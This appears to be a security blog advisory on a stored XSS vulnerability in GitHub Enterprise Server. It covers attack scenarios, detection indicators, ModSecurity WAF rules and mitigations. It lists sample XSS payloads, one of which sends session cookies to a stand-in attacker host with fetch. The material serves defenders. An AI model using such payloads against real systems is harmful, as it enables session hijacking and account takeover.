CVE-2025-13744: Stored XSS in Search & Filter Views Enables Session Hijack and Admin Compromise

Aegiron 9 mins0

CVE-2025-13744

Vulnerability Type: Cross-Site Scripting (XSS)
Category: Web Application – Stored XSS
CVSS Score: 8.4
Severity: High
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: Required
Scope: Changed
Impact: Session hijacking, privilege escalation, data exposure, administrative compromise
Exploit Availability: No publicly released exploit at the time of disclosure, but exploitation is straightforward
Exploitability: High
Affected Systems: GitHub Enterprise Server (multiple versions prior to patch)

Overview

CVE-2025-13744 is a stored cross-site scripting (XSS) vulnerability affecting GitHub Enterprise Server. The flaw exists in how certain user-controlled fields are processed and later rendered within search and filter interfaces. Input supplied by users is not consistently sanitized or safely encoded before being displayed, allowing malicious HTML or JavaScript to execute in the browser of other users.

This vulnerability is particularly dangerous because the injected payload is stored persistently and may be executed multiple times whenever affected content appears in search results, filters, dashboards, or administrative views.

Because these interfaces are commonly accessed by maintainers and administrators, the vulnerability can be leveraged to compromise high-privilege accounts.

How the Vulnerability Works

  1. A user creates or modifies an object such as:
    • Issue title
    • Pull request title or description
    • Milestone name
    • Repository metadata
    • Any searchable text field rendered by filter/search views
  2. The attacker embeds malicious HTML or JavaScript into the field.
  3. The application stores the value without sufficiently neutralizing dangerous content.
  4. When another user performs a search or views a filtered list that includes this object, the application renders the stored value directly into the page.
  5. The victim’s browser executes the malicious script under the application’s trusted origin.

Realistic Attack Scenarios

Scenario 1 – Session Hijacking

An attacker injects a payload that steals session cookies or authentication tokens. When an administrator views a search result, their active session is silently exfiltrated, allowing the attacker to impersonate them.

Scenario 2 – Privileged Actions

Injected JavaScript performs authenticated actions such as:

  • Creating new users
  • Modifying repositories
  • Changing access controls
  • Adding SSH keys or access tokens

All actions execute using the victim’s permissions.

Scenario 3 – Internal Data Exfiltration

The script reads sensitive data exposed in the DOM, API responses, or page variables and sends it to an external server.

Scenario 4 – Lateral Movement

Once an admin account is compromised, the attacker can pivot across repositories and teams within the enterprise instance.

Why This Vulnerability Is High Risk

  • Stored XSS executes repeatedly and silently
  • Search and filter views have broad visibility
  • Administrative users are likely victims
  • No advanced exploitation skills are required
  • Exploitation can bypass CSRF protections
  • Impacts confidentiality, integrity, and availability

MITRE Mapping

CWE:

  • CWE-79 – Improper Neutralization of Input During Web Page Generation (Cross-Site Scripting)

MITRE ATT&CK Techniques:

  • T1189 – Drive-by Compromise
  • T1059.007 – Command and Scripting Interpreter: JavaScript
  • T1078 – Valid Accounts (post-exploitation)

Detection Strategy

Log Sources to Monitor

  • GitHub Enterprise audit logs
  • Application logs for create/update actions
  • API request logs
  • Web server access logs
  • WAF or reverse proxy logs
  • SIEM correlation events

Indicators of Suspicious Activity

  • Object names containing HTML tags
  • JavaScript keywords in titles or descriptions
  • Repeated create/update events followed by admin UI access
  • Outbound network connections triggered by UI views
  • Unusual repository or milestone renames

Example XSS Payloads (For Testing Only)

<script>alert(1)</script>
<svg onload=alert('xss')>
<img src=x onerror=fetch('https://attacker.example/'+document.cookie)>

These payloads are representative and should only be used in test or staging environments.

WAF PROTECTION RULES

Rule Group 1 – Block Script Tags (High Confidence)

SecRule REQUEST_METHOD "@rx ^(POST|PUT|PATCH)$" \
"id:1374401,phase:2,block,log,msg:'Stored XSS attempt: script tag detected',severity:CRITICAL,chain"
SecRule ARGS|REQUEST_BODY "(?i)<\s*script\b"

Rule Group 2 – Block JavaScript Protocol Injection

SecRule REQUEST_METHOD "@rx ^(POST|PUT|PATCH)$" \
"id:1374402,phase:2,block,log,msg:'Stored XSS attempt: javascript protocol usage',severity:CRITICAL,chain"
SecRule ARGS|REQUEST_BODY "(?i)javascript\s*:"

Rule Group 3 – Block Inline Event Handlers

SecRule REQUEST_METHOD "@rx ^(POST|PUT|PATCH)$" \
"id:1374403,phase:2,block,log,msg:'Stored XSS attempt: inline event handler detected',severity:HIGH,chain"
SecRule ARGS|REQUEST_BODY "(?i)on(load|error|click|mouseover|focus|submit)\s*="

Rule Group 4 – Block SVG-Based Execution

SecRule REQUEST_METHOD "@rx ^(POST|PUT|PATCH)$" \
"id:1374404,phase:2,block,log,msg:'Stored XSS attempt: SVG execution vector',severity:HIGH,chain"
SecRule ARGS|REQUEST_BODY "(?i)<\s*svg\b"

Rule Group 5 – Obfuscation & Encoding Detection

SecRule REQUEST_METHOD "@rx ^(POST|PUT|PATCH)$" \
"id:1374405,phase:2,block,log,msg:'Stored XSS attempt: encoded or obfuscated payload',severity:MEDIUM,chain"
SecRule ARGS|REQUEST_BODY "(?i)(&#x?[0-9a-f]+;|%3c|%3e|%22|%27)"

Recommended Temporary Mitigations (If Patch Cannot Be Applied Immediately)

  • Restrict who can create or rename issues, milestones, and repositories
  • Enforce MFA for all maintainers and administrators
  • Limit access to search/filter views to trusted networks
  • Deploy the WAF rules above in blocking mode
  • Audit existing content for injected HTML or scripts
  • Rotate sessions and tokens if suspicious activity is found

Long-Term Remediation

  • Apply the official vendor patch
  • Enforce output encoding at render time
  • Sanitize all user-controlled fields
  • Add automated tests for HTML/script injection
  • Monitor create/update events for suspicious patterns

Official Patch

GitHub Enterprise Server Security Release Notes:
https://docs.github.com/en/enterprise-server@latest/admin/release-notes

Final Note

CVE-2025-13744 is a classic example of how stored XSS in shared UI components can escalate quickly into a full administrative compromise. While WAF rules provide meaningful protection, they should be treated as temporary safeguards. The definitive fix is applying the vendor patch and ensuring consistent output encoding across all rendered content.

Aegiron

Backed by 11+ years in cybersecurity and incident response, we decode the latest threats shaping today’s digital battlefield. This blog cuts through the noise with clear insights on vulnerabilities, emerging exploits, and the cyber news defenders can’t afford to miss.